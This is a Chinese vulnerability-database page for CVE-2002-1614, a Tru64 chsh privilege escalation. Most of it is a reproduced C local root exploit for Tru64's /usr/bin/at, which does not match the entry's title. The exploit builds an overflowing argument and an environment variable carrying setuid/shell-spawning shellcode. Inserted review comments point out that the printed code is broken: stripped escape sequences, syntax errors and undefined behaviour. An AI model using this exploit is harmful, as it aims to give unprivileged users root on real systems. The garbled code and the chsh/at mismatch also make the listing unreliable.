Tru64 chsh本地权限提升漏洞

Tru64 chsh本地权限提升漏洞

漏洞ID 1106241 漏洞类型 边界条件错误
发布时间 2001-03-02 更新时间 2005-10-20
CVE编号 CVE-2002-1614
CNNVD-ID CNNVD-200209-025
漏洞平台 Tru64 CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/281
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-025
|漏洞详情
Tru64是一款由HP公司开发的Unix操作系统，其中包含的chsh工具可用来更改当前用户的相关信息。Tru64中的chsh工具存在漏洞，本地攻击者可以利用该漏洞提升权限。部分HP Tru64操作系统的chsh工具存在问题，允许非特权用户获得root用户权限。没有具体技术细节描述。
|漏洞EXP
/*
 * Tru64 UNIX 4.0g (JAVA) (/usr/bin/at) local root exploit. [ALPHA]
 *
 * Author: Cody Tubbs (loophole of hhp).
 * Site:   www.hhp-programming.net
 * Email:  [email protected]
 * Date:   2/1/2000.
 *
 * I made this without access to gdb, It's untested...
 * may require modification, may require deletion, heh.
 *
 * Note: executable_stack must be on.
 */

#include <stdio.h>
#include <string.h>

#define OFFSET 0   // default for <offset> (argv[1]) when it is not supplied
#define ALLIGN 0   // default for [allign] (argv[2]); main() treats it as a byte offset 0..3
// 4-byte filler pattern; main() spells the same bytes out by hand (the
// nop[i%4] loop there is commented out, so this macro is never read).
// NOTE(review): as printed, this literal and shellcode[] below contain no
// escape sequences -- each "x.." group is plain ASCII text -- so the listing
// is not executable code as shown.
#define NOP    "x1fx04xffx47"
#define DBUF   8000 // 5604+4+528? Manipulate if needed.  Size of the argument main() passes to /usr/bin/at.

// Author's description of the payload: Alpha setuid(0) followed by
// execl("/bin/sh","sh",0).  main() appends it to the "ATEX=" environment
// variable it builds.
char shellcode[]= // Alpha setuid(0);+ execl("/bin/sh","sh",0);
 "x30x15xd9x43x11x74xf0x47x12x14x02x42xfcxffx32"
 "xb2x12x94x09x42xfcxffx32xb2xffx47x3fx26x1fx04"
 "x31x22xfcxffx30xb2xf7xffx1fxd2x10x04xffx47x11"
 "x14xe3x43x20x35x20x42xffxffxffxff"
 "x30x15xd9x43x31x15xd8x43x12x04xffx47x40xffx1e"
 "xb6x48xffxfexb7x98xffx7fx26xd0x8cx73x22x13x05"
 "xf3x47x3cxffx7exb2x69x6ex7fx26x2fx62x73x22x38"
 "xffx7exb2x13x94xe7x43x20x35x60x42xffxffxffxff";
 //Taeho Oh shellcode.

//long get_sp(void){ __asm__("bis $31,$30,$0");}

/*
 * Print the help text to stderr and terminate with exit status 1.
 * arg: argv[0], echoed into the usage and example lines.
 * NOTE(review): as printed this function does not compile -- the second
 * fprintf() call lacks its closing parenthesis, exit() is used without
 * <stdlib.h>, and the trailing "n" in each string is a bare letter rather
 * than a newline escape (extraction dropped the backslashes).
 */
void usage(char *arg) {
  fprintf(stderr, "nTru64 UNIX 4.0g (JAVA) (/usr/bin/at)");
  fprintf(stderr, " local root exploit. [ALPHA] n";
  fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)nn");
  fprintf(stderr, "Usage: %s <offset> [allign(0..3)]n", arg);
  fprintf(stderr, "Examp: %s 0n", arg);
  fprintf(stderr, "Examp: %s 0 1n", arg);
  exit(1);
}

/*
 * Entry point.  Builds two oversized inputs for the setuid /usr/bin/at
 * binary (the page classifies the bug as a boundary-condition error):
 *   - eipeip: DBUF bytes holding `address` repeated at a 4-byte stride from
 *     byte `allign`, passed as at's single command-line argument;
 *   - buffer: an "ATEX=" environment variable whose value is a 4-byte filler
 *     pattern followed by shellcode[], installed with putenv().
 * It then replaces itself with /usr/bin/at.  Only argv[1] (offset) and
 * argv[2] (allign) are read.  Per the author's header the code was never
 * tested; the NOTE(review) comments mark the places where, as printed, it
 * is not valid C or invokes undefined behavior.
 */
main(int argc, char **argv){   // implicit int return type (pre-C99 style)
 char eipeip[DBUF], buffer[4096], heh[DBUF+1];   // heh is declared but never used
 char *nop;
 int i, offset, allign;
 long address;

 if(argc < 2){
  usage(argv[0]);   // usage() exits, so argc >= 2 holds from here on
 }

 // The else branch of the first line is unreachable (argc < 2 already exited).
 if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
 if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

//address = get_sp() - offset;
// NOTE(review): get_sp() is commented out above main() and the line below is
// not valid C; `i` is also read here before it is ever assigned.  As printed,
// `address` has no defined value.
address = i& - offset;

 // Prefill with 0x69 only when allign>0, so the bytes before the first
 // 4-byte-stride store are defined.
 if(allign>0){for(i=0;i<DBUF;i++){eipeip[i]=0x69;}}
 // Store `address` every 4 bytes.  On 64-bit Alpha `long` is 8 bytes, so
 // consecutive stores overlap and the last one (i = DBUF-4) runs 4 bytes past
 // the end of eipeip; no NUL terminator is ever written, yet strlen(eipeip)
 // is taken below.
 for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}

 nop=NOP;   // assigned but never read; the loop below spells the bytes out

 // Fill buffer with the 4-byte filler pattern, reserving room for shellcode[].
 // The bound mixes int and size_t and depends on strlen(eipeip), which has no
 // terminator (see above).  `i` is advanced both in the body and in the
 // for-clause, so each iteration writes 4 bytes.
 for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
  //buffer[i]=nop[i%4];
  buffer[i]   = 0x1f;
  buffer[++i] = 0x04;
  buffer[++i] = 0xff;
  buffer[++i] = 0x47;
 }

 // Append shellcode[] after the filler, then overwrite the first five bytes so
 // the whole thing reads "ATEX=<filler><shellcode>", and put it in the
 // environment the child inherits.  No NUL is written into buffer here.
 memcpy(buffer+i,shellcode,strlen(shellcode));
 memcpy(buffer,"ATEX=",5); 
 putenv(buffer);

 // %#x with a `long` argument is a format/argument mismatch; the trailing "n"
 // is a bare letter as printed, not a newline.
 fprintf(stderr,"Return address %#x, offset: %d.n",address,offset);
 // Replace this process with at, passing the address-filled buffer as its only
 // argument.  A bare 0 (int) rather than (char *)0 is used as the variadic
 // sentinel.
 execlp("/usr/bin/at","at", eipeip, 0);
}


// milw0rm.com [2001-03-02]
|参考资料

来源: US-CERT Vulnerability Note: VU#435611
名称:VU#435611
链接:http://www.kb.cert.org/vuls/id/435611
来源:XF
名称:tru64-multiple-binaries-bo(10016)
链接:http://xforce.iss.net/xforce/xfdb/10016
来源:BUGTRAQ
名称: 20020902 Happy Labor Day from Snosoft
链接:http://www.securityfocus.com/archive/1/290115
来源:FULLDISC
名称: 20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification
链接:http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
